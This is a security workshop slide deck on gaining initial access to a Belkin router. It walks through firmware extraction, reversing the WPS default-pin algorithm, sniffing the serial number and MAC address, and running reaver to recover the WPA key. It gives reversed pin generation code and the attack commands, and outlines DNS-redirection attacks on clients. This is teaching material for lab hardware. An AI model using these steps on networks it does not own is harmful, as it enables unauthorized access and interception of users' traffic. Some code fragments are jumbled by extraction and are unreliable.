SlideShare a Scribd company logo

Embedded device hacking Session i

Malachi Jones, profile picture
Malachi Jones

This document outlines a workshop focused on hacking embedded devices, particularly consumer routers, to understand the processes involved in penetration testing. It details objectives such as exploring reverse engineering and providing hands-on experience with pen-testing tools to obtain initial remote access and escalate privileges. The workshop involves practical labs, including firmware data extraction and exploiting vulnerabilities, particularly in Wi-Fi Protected Setup (WPS) features of routers.

Technology
Related topics:
Cyber-Security
1 of 173
Downloaded 63 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
Embedded Device Hacking Session I: Obtaining Initial Remote Access By: Malachi Jones, PhD
About Me  Education  Bachelors Degree: Computer Engineering (Univ. of Florida, 2007)  Master’s Degree: Computer Engineering (GeorgiaTech, 2009)  PhD: Computer Engineering (GeorgiaTech, 2013)  Cyber Security Experience  Harris: Cyber Software Engineer (2013-2014)  Harris: Vulnerability Researcher (2015)  BoozAllen DarkLabs : Embedded Security Researcher (2016- Present) https://www.linkedin.com/in/malachijonesphd
About Dark Labs BoozAllen Dark Labs is an elite team of security researchers, penetration testers, reverse engineers, network analysts, and data scientists, dedicated to stopping cyber attacks before they occur.1 (1 http://darklabs.bah.com)
I. Motivation: Ubiquity of embedded devices II. Objectives ofWorkshop III. WorkshopOverview IV. TheWorkshop: Hacking a consumer router  Session I: Obtaining Initial Remote Access  Session II: Exploitation  Session III: pwnage V. Conclusion Outline
Motivation  Ubiquity of Embedded Devices Critical Infrastructure (Nuclear Power Plant) Life Critical Systems (Pace Maker) Financial Infrastructure (Banking & Investing) Internet ofThings (IoT) (IoT Gadgets) Commercial Products (Network Switch) Transportation Systems (Jeep)
2015: AYear of Embedded Exploitation (Link)
(Link) 2016: The Exploitation Continues…
????? 2017: Its Just Getting Started
Objectives of Workshop  Explore practical applications of reverse engineering  Discuss concepts/techniques that hackers utilize to uncover vulns in real-world embedded devices.  Provide a hands-on introduction to key pen-testing tools
Workshop Overview Want to understand the process of hacking/ pentesting a sophisticated embedded system such as a car?
Workshop Overview  A first step is to first learn how to hack a consumer router  Why?  Its cheaper, so if you make a mistake and brick it, you won’t be out of +60k  Although a simpler system and easier target, the core pentesting principles and processes are similar
Workshop Overview  We’ll focus on a Belkin router (F5D7234-4 version 5)  Its pretty cheap (<$20) and is a pretty soft target that is suitable for individuals new to embedded hacking
Workshop Overview Overall Hacking Objective: Compromise an initial target (e.g wifi router) and then use that target as leverage to compromise other targets
Workshop Overview Steps to Achieve Hacking Objective: 1) Obtain Initial remote access to the device  Wifi Router Context: This means the ability to connect to its network, which often requires knowledge of the wpa password
Workshop Overview Steps to Achieve Hacking Objective: 2) Escalate privileges on device to admin/root  Wifi Router Context: Administrative privileges can allow us to control/manipulate the IP traffic of clients connected to device
Workshop Overview Steps to Achieve Hacking Objective: 3) Exploit privileges to compromise other devices  Wifi Router Context: Send clients malicious IP traffic that allows us to compromise them also
 Router Exploitation Example (via Redirection Attack)  Step 1: Hacker gains remote access to router  Step 2: Elevates privileges to admin  Step 3: Changes DNS settings on router  Step 4: Router now talks to hacker’s server to resolve name address  Step 5: www.cnn.com now resolves to an IP address of hacker’s server  Step 6: Hacker provides malicious traffic to devices on the network  Step 7: 17 WorkshopOverview Pwned
WorkshopOverview  The workshop will be organized into three sessions that capture the pen-testing phases of going from discovery to p0wnage  Session I: Discovery of a vulnerability in theWPS implementation to obtain initial access on device  Session II: Exploring weaknesses in the web management interface to gain administrative access  Session III: Development of a proof of concept that demonstrates how aWindows 7 user can be p0wned via web browser with a maliciously configured router
 Router Exploitation Example (via Redirection Attack)  Step 1: Hacker gains remote access to router  Step 2: Elevates privileges to admin  Step 3: Changes DNS settings on router  Step 4: Router now talks to hacker’s server to resolve name address  Step 5: www.cnn.com now resolves to an IP address of hacker’s server  Step 6: Hacker provides malicious traffic to devices on the network  Step 7: 19 WorkshopOverview Pwned Session I
 Router Exploitation Example (via Redirection Attack)  Step 1: Hacker gains remote access to router  Step 2: Elevates privileges to admin  Step 3: Changes DNS settings on router  Step 4: Router now talks to hacker’s server to resolve name address  Step 5: www.cnn.com now resolves to an IP address of hacker’s server  Step 6: Hacker provides malicious traffic to devices on the network  Step 7: 20 WorkshopOverview Pwned Session II
 Router Exploitation Example (via Redirection Attack)  Step 1: Hacker gains remote access to router  Step 2: Elevates privileges to admin  Step 3: Changes DNS settings on router  Step 4: Router now talks to hacker’s server to resolve name address  Step 5: www.cnn.com now resolves to an IP address of hacker’s server  Step 6: Hacker provides malicious traffic to devices on the network  Step 7: 21 WorkshopOverview Pwned Session III
The Workshop Hacking a Consumer Router
TheWorkshop Session I: Obtaining Initial Remote Access to the Device
Session I: Outline I. Overview II. Background III. Required Material IV. Lab 1: Firmware Data Extraction with Binwalk V. Lab 2: Reversing/Bug Hunting with IDA Pro VI. Lab 3: Obtain Initial Access with Wireshark & Reaver
Session I: Overview (tldr)  WPS pin method is on by default on virtually all consumer routers  Design flaw inWPS allows pin to be brute forced in under 11000 attempts  Once aWPS pin is known, a tool such as Reaver can be utilized to retrieve the WPA key instantaneously (see next slide)  On some routers (including F5D7234-4), the default pin can be computed by reverse engineering the pin generation algorithm
Session I:The Big Picture Overall goal is to figure out what the router’s WPA password is so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password
Session I:The Big Picture Overall goal is to figure out what the router’s WPA password so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password Lab 1
Session I:The Big Picture Overall goal is to figure out what the router’s WPA password so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password Lab 2
Session I:The Big Picture Overall goal is to figure out what the router’s WPA password so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password Lab 3
End Result: Gain Access to Management Interface Session I: The Big Picture
 Router Exploitation Example (via Redirection Attack)  Step 1: Hacker gains remote access to router  Step 2: Elevates privileges to admin  Step 3: Changes DNS settings on router  Step 4: Router now talks to hacker’s server to resolve name address  Step 5: www.cnn.com now resolves to an IP address of hacker’s server  Step 6: Hacker provides malicious traffic to devices on the network  Step 7: 31 Session I:The Big Picture Pwned Session I
Session I: Outline I. Overview II. Background III. Required Material IV. Lab 1: Firmware Data Extraction with Binwalk V. Lab 2: Reversing/Bug Hunting with IDA Pro VI. Lab 3: Obtain Initial Access with Wireshark & Reaver
Session I: Background 1. WPS Design Flaw Explained 2. Exploiting Belkin’s PIN Generation Algorithm 3. IDA Pro
Background:WPS Explained  Wi-Fi Protected Setup (WPS) was created byWi-Fi Alliance in 2006  Goal to make it easy for home users to add new devices securely to network w/o entering long passphrases  One of the modes allowed for user to enter the router’s 8 digit pin to connect a desired device to network
Background:WPS Explained  Design Flaw Explained  WPS has an 8 digit pin numeric pin (0-9)  Number of attempts to bruteforce an 8 digit pin 1 2 3 4 5 6 7 8 108 = 100 million
Background:WPS Explained  Design Flaw Explained  The 8th digit pin is a checksum  Number of attempts to bruteforce a 7 digit pin 1 2 3 4 5 6 7 8 107 = 10 million
Background:WPS Explained  Design Flaw Explained  Pin split into two groups and a Nack/ack is sent that indicates if the pin for that group is correct  Number of attempts to bruteforce a 7 digit pin split into groups( 4+ 3) 1 2 3 4 5 6 7 8 104 + 103= 11000 Nack/ Ack Nack/ Ack
 We could exploit this design flaw for the Belkin router that we are targeting to obtain pin  However, there is aWPS implementation flaw, specific to this router, that allows us to get the pin in 1 try vs 11,000 Background:WPS Explained
Background: Belkin Pin Generation Exploit  Pin generation exploit material presented in this workshop is based on the write-up by Craig @ www.devttys0.com  /DEV/TTYS0 provides excellent material on embedded hacking in general and router hacking in particular
Background: Belkin Pin Generation Exploit  BelkinWPS Pin Algorithm  Note: Serial ID and WLAN MAC can be obtained by sniffing certain packets that are broadcast by the router PinGeneration Algorithm 12345678 Serial ID WLAN MAC
Background: IDA Pro  De facto tool for disassembling, decompiling, and debugging binaries  Supports a wide array of processor architectures that include the following:  MIPS  ARM  X86/x64
 Code Flow of Routine (sub_43A53C) Background: IDA Pro Features
Code Flow of Routine (sub_43A53C) For loop Loop back Here nch taken to ectively exit ction if referenced ue is ‘0’
Background: IDA Pro Features  IDA Scripting support  Supports python scripting, which is known as IDAPython  Provides a power way to add extensive utilities and features to python  Also has a native language, IDC, which is a “C-like” language
 Decompiling with Hex-Rays (x86,x64, andARM) Background: IDA Pro Features
ARM Disassembly Decompiled “Pseudo-C” Background: IDA Pro Features
 For more information on IDA, there is a pretty awesome book written by Chris Eagle Background: IDA Pro Features
 Professional Edition : $1500  Pro + Hex-rays decompiler (x86/x64 + ARM): $5500  Freeware version (link)  Very old edition w/o newer features including IDAPython  only x86 disassembler support  Still a good starting point Background: Acquiring IDA Pro
 Binary Ninja (link)  License: $99.00 (Personal License)  Up and coming legitimate alternative/competitor to IDA Pro  Supports x86/x64 , ARM, and MIPS  Decompiler support  OS Platforms:Windows, OSX , and Linux Background: IDA Pro Alternatives
Background: IDA Pro Alternatives Binary Ninja Screenshot
I. Overview II. Background III. Required Material IV. Lab 1: Firmware Data Extraction with Binwalk V. Lab 2: Reversing/Bug Hunting with IDA Pro VI. Lab 3: Obtain Initial Access with Wireshark & Reaver Session I: Outline
Required Material  Software  Kali LinuxVM 1.X  IDA Pro  Vmware/VirtualBox  Hardware  Belkin F5D7234-4 version 5  Wifi adapter w/ monitor mode (e.g.TP-LINKTL-WN722N)
Required Material
I. Overview II. Background III. Required Material IV. Big Picture V. Lab 1: Firmware Data Extraction VI. Lab 2: Reversing/Bug Hunting with IDA Pro VII. Lab 3: Obtain Initial Access with Wireshark & Reaver Session I: Outline
Lab 1: Firmware Data Extraction & Analysis Overall goal is to figure out what the router’s WPA password is so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password Lab 1
Lab 1: Firmware Data Extraction & Analysis  Steps for Extraction & Analysis 1. Install squashfs-tools if not installed 2. Perform initial analysis of firmware w/ Binwalk 3. Extract firmware data 4. Explore the squash file system folder
Extraction and Analysis (Steps) 1) Install squashfs-tools if not installed (Next Slide)
Install squashfs-tools if not installed $ sudo apt-get install squashfs-tools
Extraction and Analysis (Steps) 2) Let binwalk do an initial analysis of firmware (Next Slide)
Initial analysis with Binwalk $ sudo binwalk DIR810LB1_FW203B02.bin payload);
3) Extract firmware data (Next Slide) Extraction and Analysis (Steps)
Extract Firmware Data $ sudo binwalk –e DIR810LB1_FW203B02.bin
4) Explore files in the squash file system folder (Next Slides) Extraction and Analysis (Steps)
Explore squash filesystem ls –l /$absolute-path-to-squash-folder
Explore squash filesystem ls –l /$absolute-path-to-squash-folder/sbin Contains theWPS pin generation logic
Lab 1: Q&A  Why are we using Dlink firmware instead of Belkin?  Dlink has symbols (e.g. function names) which makes it easier to follow for those newer to reversing  Stripped firmware (i.e. no symbols) can be very difficult and take a substantial amount of time to reverse  Pin generation algorithm is conceptually similar between the Dlink and Belkin routers  What is a technique that can be used to help reverse engineer stripped binaries?  Make use of the debug strings found in binary to build intuition about what a routine is doing
Lab 1: Q&A  How did we know theWPS pin generation logic could be found at the following location: /sbin/ncc?  Can create an IDAPython script that iterates through the binaries in the filesystem to search for specific symbols and strings  Strings and symbols of interest could contain “WPS”, “WPS Pin”, “Pin generation” , etc….  How can the firmware be acquired?  [Easy] Manufacturer’s website  [Difficult] Manual extraction from the device via JTAG or the serial port (see next 2 slide)  Note: Forge Hackerspace has a workshop on manual firmware extraction !!
LinksysWRT120N PCB (Serial Port) Serial Port
LinksysWRT120N PCB (Serial Port) Serial Port
 Additional Resources  Reverse Engineering Firmware: http://www.devttys0.com/2011/05/reverse- engineering-firmware-linksys-wag120n/ Lab 1: Firmware Data Extraction
I. Overview II. Background III. Required Material IV. Lab 1: Firmware Data Extraction with Binwalk V. Lab 2: Reversing with IDA Pro VI. Lab 3: Obtain Initial Access with Wireshark & Reaver Session I: Outline
Lab 2: Reversing with IDA Pro Overall goal is to figure out what the router’s WPA password is so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password Lab 2
 Description  In this lab, we will take a look at the binary ncc, located in /sbin of the squash filesystem  Since ncc has quite a bit ofWPS logic, which includes the pin generation algorithm, we’ll do some exploring  We’ll walk through the process of locating a code segment of interest (wps algorithm) and illustrate the process of reversing the segment into C code Lab 2: Reversing with IDA Pro
 Steps for Bug Hunting and Reversing 1. Load the binary ncc into IDA Pro for analysis 2. Hunt for the pin generation algorithm 3. Analyze the inputs of the algorithm 4. Reverse algorithm segment into C code Lab 2: Reversing with IDA Pro
1) Load the binary ncc into IDA Pro for analysis (Next Slide) Lab 2: Reversing with IDA Pro (Steps)
Load the binary ncc into IDA Pro 1a. Launch IDA Pro
Load the binary ncc into IDA Pro 1b. Click “New”
Load the binary ncc into IDA Pro 1c. Drag ncc binary into IDA ncc binary IDA detects that binary is a MIPS ELF
Load the binary ncc into IDA Pro 1d. Click “ok”
Load the binary ncc into IDA Pro 1e. Wait for IDA to finish analyzing the binary
Load the binary ncc into IDA Pro 1f. IDA indicates auto analysis has been finished Auto analysis complete
2) Hunt for the pin generation algorithm (Next Slide) Reversing with IDA Pro (Steps)
Hunt for the pin generation algorithm 1a. See if you can find the pin generation routine
Hunt for the pin generation algorithm a. (Hint:What happens when I search for “router” in the Function Window) Note: Ctrl+F brings up search box Term “router” entered into the function name filter
a. (Hint:What happens when I search for “router” in the Function Window) Hunt for the pin generation algorithm Term “router” entered into the function name filter
a. (Hint:Try some search terms relevant to the algorithm we’re trying to find) Try your own search terms??? Hunt for the pin generation algorithm
a. (Try a few more keywords before you go to the next slide!!!) Try your own search terms ??? Hunt for the pin generation algorithm
Hunt for the pin generation algorithm b. Let’s try the keyword “default” and see what we get This looks interesting
Hunt for the pin generation algorithm c. Double click on “get_default_pin”
Hunt for the pin generation algorithm c. (Continued…)
3)Analyzing the pin algorithm in subroutine get_default_pin (Next Slide) Lab 2: Reversing with IDA Pro (Steps)
Analyze pin generation algorithm a. Lets examine possible input sources to algorithm
Analyze pin generation algorithm a. Lets examine possible input sources to algorithm A call is made to a sub-routine that appears to get some information Subset of data from lockAndGetInfo_log will be formatted as follows: “%c:%:c%:c%….”
 Any guesses on what “%c:%c…” might be? Hunt for the pin generation algorithm b. Lets take a closer look at the sprintf call Decompiling by hand to pseudo C char buffer [….]; char * data =lockAndGetInfo_log->interesting_data_element …………………………………… sprintf (buffer, “%c%c:%c%c:%c%c:%c%c:%c%c:%c%c”, data[0], data[1],…,data[11]);
 Hints  Its 12 characters with a “:” in between each pair of 2 characters  This is a networking device  What is something (e.g. identifier) that each networking devices typically has that would be a good seed for a pin generation algorithm? Hunt for the pin generation algorithm c. Figure out what type of data could “%c%c…:%c%c” represent char buffer [….]; char * data =lockAndGetInfo_log->interesting_data_element …………………………………… sprintf (buffer, “%c%c:%c%c:%c%c:%c%c:%c%c:%c%c”, data[0], data[1],…,data[11]);
 Answer: MAC address  Unique across all networking devices  12 bytes  Often used in combination with other values to seed various algorithms Hunt for the pin generation algorithm c. Figure out what type of data could “%c%c:..:%c%c” represent char buffer [….]; char * data =lockAndGetInfo_log->interesting_data_element …………………………………… sprintf (buffer, “%c%c:%c%c:%c%c:%c%c:%c%c:%c%c”, data[0], data[1],…,data[11]);
4) Reverse algorithm segment into C code (Next Slide) Extraction and Analysis (Steps)
 As we will see, reversing assembly into C can be a tedious and arduous process  We will reverse the following code segment: Reverse algorithm segment into C code a. Reversing an example snippet of code
 Instruction ‘li’: Loads a constant value into a register Reverse algorithm segment into C code li $v0, 0x38E38E39 multu $a3, $v0 ……………………………………………… mfhi $v0 srl $v0, 1 a. Reversing an example snippet of code Disassembly Psuedo-C code v0 = 0x38E38E39  MIPS Instruction ‘li’:  Loads a constant value into a register  Value will be used for future arithmetic operation
 Instruction ‘li’: Loads a constant value into a register Reverse algorithm segment into C code li $v0, 0x38E38E39 multu $a3, $v0 ……………………………………………… mfhi $v0 srl $v0, 1 a. Reversing an example snippet of code Disassembly Psuedo-C code v0 = 0x38E38E39 [hi,lo] = v0*a3  MIPS Instruction ‘multiu’:  Multiply two 32-bit values (e.g. a3 & v0)  Registers `hi’ & ‘lo’ store the resulting 64-bit product hi (upper 32-bits) lo (lower 32-bits) 64-bit product
 Instruction ‘li’: Loads a constant value into a register Reverse algorithm segment into C code li $v0, 0x38E38E39 multu $a3, $v0 ……………………………………………… mfhi $v0 srl $v0, 1 a. Reversing an example snippet of code Disassembly Psuedo-C code v0 = 0x38E38E39 [hi,lo] = v0*a3 v0 = (v0*a3)>>32; right shift 32  MIPS Instruction ‘mfhi’:  Move value in ‘hi’ register to specified register (e.g. v0)  This is equivalent to right shifting the 64-bit product of v0 & a3 by 32-bits
 Instruction ‘li’: Loads a constant value into a register Reverse algorithm segment into C code li $v0, 0x38E38E39 multu $a3, $v0 ……………………………………………… mfhi $v0 srl $v0, 1 a. Reversing an example snippet of code Disassembly Psuedo-C code v0 = 0x38E38E39 [hi,lo] = v0*a3 v0 = (v0*a3)>>32; right shift 32 v0 = v0 >> 1; = ((a3 * 0x38E38E39) >>32) >> 1  MIPS Instruction ‘srl’:  Shift right logical  Logical means that the bit that replaces the most upper bits as the shift occurs is the value ‘0’  Lower bits that get shifted out are discarded
 Observations  The net result of the assembly instructions is a complex looking expression  It turns out that this can be simplified quite a bit Reverse algorithm segment into C code li $v0, 0x38E38E39 multu $a3, $v0 ……………………………………………… mfhi $v0 srl $v0, 1 a. Reversing an example snippet of code Disassembly C code v0 = ((a3 * 0x38E38E39) >>32) >> 1
 Observations  Logical shifts have an associative property  e.g. (v1>> 32) >> 1 == v1 >> 33 Reverse algorithm segment into C code li $v0, 0x38E38E39 multu $a3, $v0 ……………………………………………… mfhi $v0 srl $v0, 1 a. Reversing an example snippet of code Disassembly C code v0 = ((a3 * 0x38E38E39) >>32) >> 1 = (a3 * 0x38E38E39) >> 33
 Observations  Right shifting a number by 1 has the effect of dividing that number by 2.  Therefore right shifting a number by 33 has the effect of dividing that number by 2^33 = 8589934592 Reverse algorithm segment into C code li $v0, 0x38E38E39 multu $a3, $v0 ……………………………………………… mfhi $v0 srl $v0, 1 a. Reversing an example snippet of code Disassembly C code v0 = ((a3 * 0x38E38E39) >>32) >> 1 = (a3 * 0x38E38E39) >> 33 = (a3 * 0x38E38E39)/8589934592
 Observations  (954437177)10 = 0x38E38E39 Reverse algorithm segment into C code li $v0, 0x38E38E39 multu $a3, $v0 ……………………………………………… mfhi $v0 srl $v0, 1 a. Reversing an example snippet of code Disassembly C code v0 = ((a3 * 0x38E38E39) >>32) >> 1 = (a3 * 0x38E38E39) >> 33 = (a3 * 0x38E38E39)/8589934592 = (a3)(954437177/8589934592)
 Observations  1/9 ~=(954437177)/8589934592 Reverse algorithm segment into C code li $v0, 0x38E38E39 multu $a3, $v0 ……………………………………………… mfhi $v0 srl $v0, 1 a. Reversing an example snippet of code Disassembly C code v0 = ((a3 * 0x38E38E39) >>32) >> 1 = (a3 * 0x38E38E39) >> 33 = (a3 * 0x38E38E39)/8589934592 = (a3)(954437177/8589934592) = (a3)(1/9)
 Observations  As the above example illustrates, the disassembly performs operations such as shifts to do multiplication and division  What looks complex may be able to be decompiled into something much simpler Reverse algorithm segment into C code li $v0, 0x38E38E39 multu $a3, $v0 ……………………………………………… mfhi $v0 srl $v0, 1 a. Reversing an example snippet of code v0 = ($a3)/9 Disassembly C code
 Luckily someone else (Craig) did all the grunt work in decompiling the disassembly for us  But we’ve seen how the general process for reversing works, so in theory we could do it   On the next slides, we’ll show the complete C implementation of the get_default_pin algoritm Reverse algorithm segment into C code b. Reversing the entire algorithm
 dd /* * The largest possible remainder for any value divided by 10,000,000 * is 9,999,999 (7 digits). The smallest possible remainder is, * obviously, 0. */ pin = pin % 10000000; /* The pin needs to be at least 7 digits long */ if(pin < 1000000) { /* * The largest possible remainder for any value divided by 9 is * 8; hence this adds at most 9,000,000 to the pin value, and at * least 1,000,000. This guarantees that the pin will be 7 digits * long, and also means that it won't start with a 0. */ pin += ((pin % 9) * 1000000) + 1000000; } /* * The final 8 digit pin is the 7 digit value just computed, plus a * checksum digit. Note that in the disassembly, the wps_pin_checksum * function is inlined (it's just the standard WPS checksum implementation). */ pin = ((pin * 10) + wps_pin_checksum(pin)); sprintf(buf, "%08d", pin); return pin; } get_default_pin (Dlink router) unsigned int generate_default_pin(char *buf) { char *mac; char mac_address[32] = { 0 }; unsigned int oui, nic, pin; /* Get a pointer to the WAN MAC address */ mac = lockAndGetInfo_log()->wan_mac_address; /* * Create a local, NULL-terminated copy of the WAN MAC (simplified from * the original code's sprintf/memmove loop). */ sprintf(mac_address, "%c%c%c%c%c%c%c%c%c%c%c%c", mac[0], mac[1], mac[2], …… mac[11] sscanf(mac_address, "%06X%06X", &oui, &nic); /* Do some XOR munging of the NIC. */ pin = (nic ^ 0x55AA55); pin = pin ^ (((pin & 0x0F) << 4) + ((pin & 0x0F) << 8) + ((pin & 0x0F) << 12) + ((pin & 0x0F) << 16) + ((pin & 0x0F) << 20));
 We could follow a similar process to reverse the Belkin Pin algorithm  Yet again, Craig has spared us the trouble  On the next slide is the reversed C implementation of the Belkin algorithm Reverse algorithm segment into C code c. Reversing the Belkin Pin Generation Algorithm
k1 = (sn[SN_DIGIT_2] + sn[SN_DIGIT_3] + nic[NIC_NIBBLE_0] + nic[NIC_NIBBLE_1]) % 16; k2 = (sn[SN_DIGIT_0] + sn[SN_DIGIT_1] + nic[NIC_NIBBLE_3] + nic[NIC_NIBBLE_2]) % 16; pin = k1 ^ sn[SN_DIGIT_1]; t1 = k1 ^ sn[SN_DIGIT_0]; t2 = k2 ^ nic[NIC_NIBBLE_1]; p1 = nic[NIC_NIBBLE_0] ^ sn[SN_DIGIT_1] ^ t1; p2 = k2 ^ nic[NIC_NIBBLE_0] ^ t2; p3 = k1 ^ sn[SN_DIGIT_2] ^ k2 ^ nic[NIC_NIBBLE_2]; k1 = k1 ^ k2; pin = (pin ^ k1) * 16; pin = (pin + t1) * 16; pin = (pin + p1) * 16; pin = (pin + t2) * 16; pin = (pin + p2) * 16; pin = (pin + k1) * 16; pin += p3; pin = (pin % 10000000) - (((pin % 10000000) / 10000000) * k1) return (pin * 10) + wps_checksum(pin); } get_default_pin (Belkin router) /* Munges the MAC and serial numbers to create a WPS pin */ int pingen(char *mac, char *serial) { #define NIC_NIBBLE_0 0 #define NIC_NIBBLE_1 1 #define NIC_NIBBLE_2 2 #define NIC_NIBBLE_3 3 #define SN_DIGIT_0 0 #define SN_DIGIT_1 1 #define SN_DIGIT_2 2 #define SN_DIGIT_3 3 int sn[4], nic[4], mac_len, serial_len; int k1, k2, pin p1, p2, p3 t1, t2; mac_len = strlen(mac); serial_len = strlen(serial); /* Get the four least significant digits of the serial number */ sn[SN_DIGIT_0] = char2int(serial[serial_len-1]); sn[SN_DIGIT_1] = char2int(serial[serial_len-2]); sn[SN_DIGIT_2] = char2int(serial[serial_len-3]); sn[SN_DIGIT_3] = char2int(serial[serial_len-4]); /* Get the four least significant nibbles of the MAC address */ nic[NIC_NIBBLE_0] = char2int(mac[mac_len-1]); nic[NIC_NIBBLE_1] = char2int(mac[mac_len-2]); nic[NIC_NIBBLE_2] = char2int(mac[mac_len-3]); nic[NIC_NIBBLE_3] = char2int(mac[mac_len-4]);
Lab 2: Q&A  Why are weaknesses in implementation of a security design not discovered before product released?  Companies care more about time-to-market  Subscribe to the notion of security through obscurity  How long does the reverse engineering process take?  Depends on the device and the skills of the personnel  Charlie and Chris (Chrysler Jeep hack) said it took them over 3.5 months and they are pretty experienced
Lab 2: Q&A  Is the reverse process always this tedious?  In general…yes, if not more so.  What things can make reversing harder?  Stripped binaries (e.g. no symbols)  Anti-debugging techniques  Code obfuscation  Writing original code in C++  What is an ELF (Executable and Linkable Format)?  Standard file format on Unix-like systems
Lab 2: Q&A  Why is MIPS still popular in embedded devices?  Licensing costs for MIPS is cheaper than ARM  Why couldn’t we decompile using IDA Pro?  IDA only supportsARM and x86/64  No reliable decompilers for MIPS in general.
 Additional Resources  Reversing D-Link’sWPS Pin Algorithm: http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/ Lab 2: Reversing with IDA Pro
I. Overview II. Background III. Required Material IV. Lab 1: Firmware Data Extraction with Binwalk V. Lab 2: Reversing with IDA Pro VI. Lab 3: Obtain Initial Access with Wireshark & Reaver Session I: Outline
Lab 3: Obtaining initial access Overall goal is to figure out what the router’s WPA password is so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password Lab 3
 Description  In this lab, we will explore how to use our knowledge of the pin generation algorithm to derive the WPA Key  Specifically, we will first need to acquire relevant input information into the algorithm by using Wireshark, and then run the algorithm to compute the WPS PIN  Then we’ll need to use Reaver to derive the WPA key from the WPS PIN Lab 3: Obtaining initial access
 Steps forObtaining initial access 1. Acquire serial and wlan mac w/ Wireshark 2. Compile & execute wps pin generation algorithm 3. Run Reaver to obtain theWPA key 4. Connect to the router utilizing obtained WPA key Lab 3: Obtaining initial access
1) Acquire Serial and WLAN MAC with Wireshark (Next Slides) Lab 3: Obtaining initial access
 We’ll need a wifi adapter that supports monitor mode  Monitor mode enables monitoring of all traffic received  Normally, the wifi adapter will filter out traffic not destined for it  An example wifi adapter that supports monitor mode is theTP-LINKTL-WN722N (pictured above); cost about $12 Acquiring serial and wlan information a. Attach Wifi adapter (monitor mode support) to PC
b. Connect wifi adapter to guest Kali-Linux VM Acquiring serial and wlan information Click this
b. Connect wifi adapter to guest Kali-Linux VM Acquiring serial and wlan information ClickThis
c. Get the name of the wireless interface (e.g. wlanx),were x is 0-9 Acquiring serial and wlan information $ sudo iwconfig Wireless Interface Name
d. Bring the wireless interface down so we can configure it Acquiring serial and wlan information $ sudo ifconfig wlanx down
e. Change the wifi mode to monitor Acquiring serial and wlan information $ sudo iwconfig wlan0 mode monitor
f. Set the channel of wireless interface to channel y, where y in 1-12 Acquiring serial and wlan information $ sudo iwconfig wlan0 channel %y%
g. Bring the wireless interface back up Acquiring serial and wlan information $ sudo ifconfig wlan0 up
h. Launch Wireshark Acquiring serial and wlan information $ sudo wireshark
h. Click on wireless interface wlanx Acquiring serial and wlan information Click this
i. Click Start Acquiring serial and wlan information Click this
i. Click Start Acquiring serial and wlan information
i. (Continued) Acquiring serial and wlan information
j.Wait approximately 1-3 minute(s) as Wireshark captures packets Acquiring serial and wlan information
k. Stop the capture Acquiring serial and wlan information Click to stop Capture
l. Find a probe response message from Belkin_xx:xx:xx and click on it Acquiring serial and wlan information
m. Click on “IEEE 802.11 wireless LAN management” to expand the selection Acquiring serial and wlan information Click to expand
n. (After click) Acquiring serial and wlan information
o. Click on “Tagged parameters” to expand the selection Acquiring serial and wlan information After Click
p. Click on “Vendor Specific” to expand the selection Acquiring serial and wlan information After Click
q. Locate and record the Serial Number Acquiring serial and wlan information Serial Number
r. Locate and Record wlan MAC address of the Belkin router Acquiring serial and wlan information MAC Address
2. Compile & execute wps pin generation algorithm (Next Slides) Lab 3: Obtaining initial access
a. Download pingen algorithm source from here and save to home dir Compile & Execute WPS pingen Algorithm
b. Compile pingen.c Compile & Execute WPS pingen Algorithm $ sudo gcc -Wall pingen.c -o pingen
c. Executing the pingen binary to see usage Compile & Execute WPS pingen Algorithm $ ./pingen
d. Pass in appropriate parameters and execute pingen to get pin Compile & Execute WPS pingen Algorithm $ ./pingen xxxx xxxx Default Pin
e.The Results Compile & Execute WPS pingen Algorithm The Pin
Default Pin e.The Results Compile & Execute WPS pingen Algorithm The Pin
3. Run Reaver to obtainWPA Key (Next Slides) Lab 3: Obtaining initial access
a. Executing Reaver with appropriate arguments Run Reaver to Obtain WPA Key reaver -i (monitor interface) -b (BSSID) -c (channel) - --pin=(8 digit pin) –T 5 -vv
b.Wait for the Results (can take up to 30 seconds) Run Reaver to Obtain WPA Key WPA KEY
4. Connect to the router by utilizing the obtainedWPA key (Next Slides) Lab 3: Obtaining initial access
a. Bring the wireless interface down so we can configure it Connect to router with WPA key $ sudo ifconfig wlanx down
b. Change the wifi mode to managed Connect to router with WPA key $ sudo iwconfig wlan0 mode managed
c. Bring the wireless interface back up Connect to router with WPA key $ sudo ifconfig wlan0 up
c.Wait about a minute or so for the interface to be brought up Connect to router with WPA key
d.Click the networking icon Connect to router with WPA key Click this icon
e. Select the Appropriate Access Point Connect to router with WPA key Click on the appropriateAP
f. Enter the WPA key and connect Connect to router with WPA key EnterWPA Key
g.Wait while connection occurs Connect to router with WPA key Connecting…
h. Connection is established Connect to router with WPA key Success!!
h. Connect to web management server (Obtained Initial Access!!) Connect to router with WPA key
